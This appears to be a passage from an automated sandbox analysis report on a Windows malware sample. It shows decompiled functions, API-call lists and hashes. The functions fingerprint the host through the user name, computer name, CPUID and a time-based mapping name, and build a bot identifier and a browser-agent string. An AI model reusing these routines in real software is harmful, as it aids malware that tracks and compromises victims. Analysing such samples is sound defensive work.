                                                                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
                                                                                                                                                                                                                                                                                    • Instruction ID: f16992ede6e9b1fa1a308e8e7d2eff0443640e5d4db6832e5b67cda52e88a40c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A421F2B6500608BFDB02AFE8DE98FDE37BCEB49394F004425F611E7240E6709868CB60
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                                                                    			E00A757AD(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _v12;
                                                                                                                                                                                                                                                                                    				short _v56;
                                                                                                                                                                                                                                                                                    				struct _FILETIME* _t12;
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t27 = __edx;
                                                                                                                                                                                                                                                                                    				_t12 =  &_v12;
                                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                                    				_push(_v8);
                                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                                    				L00A77F50();
                                                                                                                                                                                                                                                                                    				_push(_t12);
                                                                                                                                                                                                                                                                                    				_v12 = _t12;
                                                                                                                                                                                                                                                                                    				_t13 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    				_t5 = _t13 + 0xa7b84d; // 0x5568df5
                                                                                                                                                                                                                                                                                    				_t6 = _t13 + 0xa7b580; // 0x530025
                                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                                    				_push( &_v56);
                                                                                                                                                                                                                                                                                    				_v8 = _t27;
                                                                                                                                                                                                                                                                                    				L00A77C2A();
                                                                                                                                                                                                                                                                                    				_t17 = CreateFileMappingW(0xffffffff, 0xa7a2d4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                                                                    				_t30 = _t17;
                                                                                                                                                                                                                                                                                    				if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    					_t28 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                                                                                                    							_t28 = GetLastError();
                                                                                                                                                                                                                                                                                    							if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *_a4 = _t30;
                                                                                                                                                                                                                                                                                    							 *_a8 = _t21;
                                                                                                                                                                                                                                                                                    							_t28 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t28 = 2;
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						CloseHandle(_t30);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t28;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00A72DF9,?,00000001,?), ref: 00A757B9
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A757CF
                                                                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 00A757F4
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00A7A2D4,00000004,00000000,00001000,?), ref: 00A75810
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9,?), ref: 00A75822
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A75839
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9), ref: 00A7585A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9,?), ref: 00A75862
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4c209f85cca34efc78184e1e0841044c9a44a776870c472e6de7aad4ec616919
                                                                                                                                                                                                                                                                                    • Instruction ID: 0e38908b9684886537623fab7f9c6f48a3d37b2b54d89c2d267c01510cd99ee8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c209f85cca34efc78184e1e0841044c9a44a776870c472e6de7aad4ec616919
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54218E72A00604BBD711DBA4CC05F9E77B9AF84750F24C065FA0EEA191EAB099429B91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                    			E00A73946(char __eax, signed int* __esi) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                                                                                                    				long _t50;
                                                                                                                                                                                                                                                                                    				char _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                                                                    				signed int* _t64;
                                                                                                                                                                                                                                                                                    				char _t65;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				signed int* _t69;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t69 = __esi;
                                                                                                                                                                                                                                                                                    				_t65 = __eax;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = __eax;
                                                                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                                                                    					_t59 =  *0xa7a2c8; // 0xbd092303
                                                                                                                                                                                                                                                                                    					_v12 = _t59;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t64 = _t69;
                                                                                                                                                                                                                                                                                    				E00A7354E( &_v12, _t64);
                                                                                                                                                                                                                                                                                    				if(_t65 != 0) {
                                                                                                                                                                                                                                                                                    					 *_t69 =  *_t69 ^  *0xa7a2cc ^ 0x4c0ca0ae;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					GetUserNameW(0,  &_v8); // executed
                                                                                                                                                                                                                                                                                    					_t50 = _v8;
                                                                                                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                                                                                                    						_t62 = RtlAllocateHeap( *0xa7a290, 0, _t50 + _t50);
                                                                                                                                                                                                                                                                                    						if(_t62 != 0) {
                                                                                                                                                                                                                                                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    								_t63 = _t62;
                                                                                                                                                                                                                                                                                    								 *_t69 =  *_t69 ^ E00A73F12(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							HeapFree( *0xa7a290, 0, _t62);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t61 = __imp__;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				GetComputerNameW(0,  &_v8);
                                                                                                                                                                                                                                                                                    				_t34 = _v8;
                                                                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    					_t68 = RtlAllocateHeap( *0xa7a290, 0, _t34 + _t34);
                                                                                                                                                                                                                                                                                    					if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                                                                                                                                                                                                                                                    							_t63 = _t68;
                                                                                                                                                                                                                                                                                    							_t69[3] = _t69[3] ^ E00A73F12(_v8 + _v8, _t63);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						HeapFree( *0xa7a290, 0, _t68);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				asm("cpuid");
                                                                                                                                                                                                                                                                                    				_t67 =  &_v28;
                                                                                                                                                                                                                                                                                    				 *_t67 = 1;
                                                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                                                                                                                                                                                                                                                    				 *(_t67 + 8) = _t63;
                                                                                                                                                                                                                                                                                    				 *(_t67 + 0xc) = _t64;
                                                                                                                                                                                                                                                                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                                                                                                                                                                                                                                                                    				_t69[1] = _t69[1] ^ _t39;
                                                                                                                                                                                                                                                                                    				return _t39;
                                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A7397D
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00A72F3F), ref: 00A73994
                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A739A1
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A72F3F,?,?,?,?,?,00A744F9,?,00000001), ref: 00A739C2
                                                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A739E9
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A739FD
                                                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A73A0A
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 00A73A28
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3239747167-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2d2bee0150866141d632ee360dc1227343f36be0942cb58988e6ef689c500cd1
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b75ef213e310edccfca82955e7348e3df78f8ff9b18563b26dcbc6da4e6887e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d2bee0150866141d632ee360dc1227343f36be0942cb58988e6ef689c500cd1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9313C72A10209EFDB11DFA9DC81AAEB7F9EB94300F11C429E549E3221D770DE41AB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E00A72D63(signed int __edx) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				CHAR* _t42;
                                                                                                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                                                                                                    				long _t49;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    				long _t71;
                                                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                                                    				signed char _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				long _t82;
                                                                                                                                                                                                                                                                                    				long _t84;
                                                                                                                                                                                                                                                                                    				CHAR* _t87;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t27 = E00A75901();
                                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                    					_t77 =  *0xa7a2b4; // 0x4000000a
                                                                                                                                                                                                                                                                                    					_t73 = (_t77 & 0xf0000000) + _t27;
                                                                                                                                                                                                                                                                                    					 *0xa7a2b4 = (_t77 & 0xf0000000) + _t27;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t28 =  *0xa7a14c(0, 2);
                                                                                                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                                                                                                    				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                                                                                                                                                                                                                                                                    					_t31 = E00A74097( &_v8,  &_v16); // executed
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_t84 = _t31;
                                                                                                                                                                                                                                                                                    					_t32 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_push(0xa7a2d8);
                                                                                                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                                                                                                    					_t7 = _t32 + 0xa7b5bc; // 0x4d283a53
                                                                                                                                                                                                                                                                                    					 *0xa7a2d4 = 0xc;
                                                                                                                                                                                                                                                                                    					 *0xa7a2dc = 0;
                                                                                                                                                                                                                                                                                    					L00A75EC2();
                                                                                                                                                                                                                                                                                    					_t36 = E00A757AD(_t79,  &_v24,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                    						CloseHandle(_v24);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(_t84 != 5) {
                                                                                                                                                                                                                                                                                    						_t37 = _v16;
                                                                                                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                    							E00A73946(_t37 ^ 0xe8fa7dd7,  &_v40);
                                                                                                                                                                                                                                                                                    							_t87 = E00A75C4E(0x27);
                                                                                                                                                                                                                                                                                    							__eflags = _t87;
                                                                                                                                                                                                                                                                                    							if(_t87 != 0) {
                                                                                                                                                                                                                                                                                    								asm("bswap eax");
                                                                                                                                                                                                                                                                                    								asm("bswap eax");
                                                                                                                                                                                                                                                                                    								asm("bswap eax");
                                                                                                                                                                                                                                                                                    								asm("bswap eax");
                                                                                                                                                                                                                                                                                    								_t64 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    								_t18 = _t64 + 0xa7b916; // 0x78383025
                                                                                                                                                                                                                                                                                    								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                                                                                                                                                                                                                                                                    								_t88 = _t88 + 0x18;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *0xa7a328 = _t87;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t38 = E00A72304();
                                                                                                                                                                                                                                                                                    						 *0xa7a2c8 =  *0xa7a2c8 ^ 0xe8fa7dd7;
                                                                                                                                                                                                                                                                                    						 *0xa7a318 = _t38;
                                                                                                                                                                                                                                                                                    						_t39 = E00A75C4E(0x60);
                                                                                                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                                                                                                    						 *0xa7a37c = _t39;
                                                                                                                                                                                                                                                                                    						if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    							_t84 = 8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							memset(_t39, 0, 0x60);
                                                                                                                                                                                                                                                                                    							_t54 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    							_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                                                    							__imp__(_t54 + 0x40);
                                                                                                                                                                                                                                                                                    							_t56 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    							 *_t56 = 0xa7b882;
                                                                                                                                                                                                                                                                                    							_t84 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _t84;
                                                                                                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                                                                                                    							_t42 = RtlAllocateHeap( *0xa7a290, _t84, 0x52);
                                                                                                                                                                                                                                                                                    							__eflags = _t42;
                                                                                                                                                                                                                                                                                    							 *0xa7a310 = _t42;
                                                                                                                                                                                                                                                                                    							if(_t42 == 0) {
                                                                                                                                                                                                                                                                                    								_t84 = 8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t74 =  *0xa7a2b4; // 0x4000000a
                                                                                                                                                                                                                                                                                    								_t79 = _t74 & 0x000000ff;
                                                                                                                                                                                                                                                                                    								_t76 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    								_t19 = _t76 + 0xa7b212; // 0x697a6f4d
                                                                                                                                                                                                                                                                                    								_t73 = _t19;
                                                                                                                                                                                                                                                                                    								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xa792c7);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t84;
                                                                                                                                                                                                                                                                                    							if(_t84 == 0) {
                                                                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    								E00A73946( ~_v8 &  *0xa7a2c8, 0xa7a00c); // executed
                                                                                                                                                                                                                                                                                    								_t84 = E00A7374B(_t73);
                                                                                                                                                                                                                                                                                    								__eflags = _t84;
                                                                                                                                                                                                                                                                                    								if(_t84 != 0) {
                                                                                                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t48 = E00A73E8F(_t73); // executed
                                                                                                                                                                                                                                                                                    								__eflags = _t48;
                                                                                                                                                                                                                                                                                    								if(_t48 != 0) {
                                                                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                                                                    									_t82 = _v12;
                                                                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                                                                                                    										_t49 = E00A71B47(_t79, _t82, _v8); // executed
                                                                                                                                                                                                                                                                                    										_t84 = _t49;
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _t82;
                                                                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t23 = _t82 + 4; // 0x5
                                                                                                                                                                                                                                                                                    									_t84 = E00A75D26(__eflags, _t23);
                                                                                                                                                                                                                                                                                    									__eflags = _t84;
                                                                                                                                                                                                                                                                                    									if(_t84 == 0) {
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t84 = 8;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t71 = _v12;
                                                                                                                                                                                                                                                                                    						if(_t71 == 0) {
                                                                                                                                                                                                                                                                                    							L31:
                                                                                                                                                                                                                                                                                    							if(_v20 == 0 || _v20 == 1) {
                                                                                                                                                                                                                                                                                    								 *0xa7a150();
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t72 = _t71 + 4;
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                                                                    							_push(_t72);
                                                                                                                                                                                                                                                                                    							_t67 = 5;
                                                                                                                                                                                                                                                                                    						} while (E00A763CD(_t67, 0) == 0x4c7);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L31;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t84 = _t28;
                                                                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                                                                    					return _t84;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                                                                    0x00a72dc4
                                                                                                                                                                                                                                                                                    0x00a72dc9
                                                                                                                                                                                                                                                                                    0x00a72dce
                                                                                                                                                                                                                                                                                    0x00a72dd0
                                                                                                                                                                                                                                                                                    0x00a72dd7
                                                                                                                                                                                                                                                                                    0x00a72de1
                                                                                                                                                                                                                                                                                    0x00a72de7
                                                                                                                                                                                                                                                                                    0x00a72df4
                                                                                                                                                                                                                                                                                    0x00a72dfb
                                                                                                                                                                                                                                                                                    0x00a72e00
                                                                                                                                                                                                                                                                                    0x00a72e00
                                                                                                                                                                                                                                                                                    0x00a72e09
                                                                                                                                                                                                                                                                                    0x00a72e32
                                                                                                                                                                                                                                                                                    0x00a72e35
                                                                                                                                                                                                                                                                                    0x00a72e42
                                                                                                                                                                                                                                                                                    0x00a72e49
                                                                                                                                                                                                                                                                                    0x00a72e55
                                                                                                                                                                                                                                                                                    0x00a72e57
                                                                                                                                                                                                                                                                                    0x00a72e59
                                                                                                                                                                                                                                                                                    0x00a72e5e
                                                                                                                                                                                                                                                                                    0x00a72e64
                                                                                                                                                                                                                                                                                    0x00a72e6a
                                                                                                                                                                                                                                                                                    0x00a72e70
                                                                                                                                                                                                                                                                                    0x00a72e73
                                                                                                                                                                                                                                                                                    0x00a72e78
                                                                                                                                                                                                                                                                                    0x00a72e80
                                                                                                                                                                                                                                                                                    0x00a72e82
                                                                                                                                                                                                                                                                                    0x00a72e82
                                                                                                                                                                                                                                                                                    0x00a72e85
                                                                                                                                                                                                                                                                                    0x00a72e85
                                                                                                                                                                                                                                                                                    0x00a72e8b
                                                                                                                                                                                                                                                                                    0x00a72e90
                                                                                                                                                                                                                                                                                    0x00a72e98
                                                                                                                                                                                                                                                                                    0x00a72e9d
                                                                                                                                                                                                                                                                                    0x00a72ea2
                                                                                                                                                                                                                                                                                    0x00a72ea4
                                                                                                                                                                                                                                                                                    0x00a72ea9
                                                                                                                                                                                                                                                                                    0x00a72ed8
                                                                                                                                                                                                                                                                                    0x00a72eab
                                                                                                                                                                                                                                                                                    0x00a72eb0
                                                                                                                                                                                                                                                                                    0x00a72eb5
                                                                                                                                                                                                                                                                                    0x00a72eba
                                                                                                                                                                                                                                                                                    0x00a72ec1
                                                                                                                                                                                                                                                                                    0x00a72ec7
                                                                                                                                                                                                                                                                                    0x00a72ecc
                                                                                                                                                                                                                                                                                    0x00a72ed2
                                                                                                                                                                                                                                                                                    0x00a72ed2
                                                                                                                                                                                                                                                                                    0x00a72ed9
                                                                                                                                                                                                                                                                                    0x00a72edb
                                                                                                                                                                                                                                                                                    0x00a72eea
                                                                                                                                                                                                                                                                                    0x00a72ef0
                                                                                                                                                                                                                                                                                    0x00a72ef2
                                                                                                                                                                                                                                                                                    0x00a72ef7
                                                                                                                                                                                                                                                                                    0x00a72f23
                                                                                                                                                                                                                                                                                    0x00a72ef9
                                                                                                                                                                                                                                                                                    0x00a72ef9
                                                                                                                                                                                                                                                                                    0x00a72eff
                                                                                                                                                                                                                                                                                    0x00a72f0c
                                                                                                                                                                                                                                                                                    0x00a72f12
                                                                                                                                                                                                                                                                                    0x00a72f12
                                                                                                                                                                                                                                                                                    0x00a72f1a
                                                                                                                                                                                                                                                                                    0x00a72f1c
                                                                                                                                                                                                                                                                                    0x00a72f24
                                                                                                                                                                                                                                                                                    0x00a72f26
                                                                                                                                                                                                                                                                                    0x00a72f2d
                                                                                                                                                                                                                                                                                    0x00a72f3a
                                                                                                                                                                                                                                                                                    0x00a72f44
                                                                                                                                                                                                                                                                                    0x00a72f46
                                                                                                                                                                                                                                                                                    0x00a72f48
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72f4a
                                                                                                                                                                                                                                                                                    0x00a72f4f
                                                                                                                                                                                                                                                                                    0x00a72f51
                                                                                                                                                                                                                                                                                    0x00a72f58
                                                                                                                                                                                                                                                                                    0x00a72f5c
                                                                                                                                                                                                                                                                                    0x00a72f5f
                                                                                                                                                                                                                                                                                    0x00a72f74
                                                                                                                                                                                                                                                                                    0x00a72f78
                                                                                                                                                                                                                                                                                    0x00a72f7d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72f7d
                                                                                                                                                                                                                                                                                    0x00a72f61
                                                                                                                                                                                                                                                                                    0x00a72f63
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72f65
                                                                                                                                                                                                                                                                                    0x00a72f6e
                                                                                                                                                                                                                                                                                    0x00a72f70
                                                                                                                                                                                                                                                                                    0x00a72f72
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72f72
                                                                                                                                                                                                                                                                                    0x00a72f55
                                                                                                                                                                                                                                                                                    0x00a72f55
                                                                                                                                                                                                                                                                                    0x00a72f26
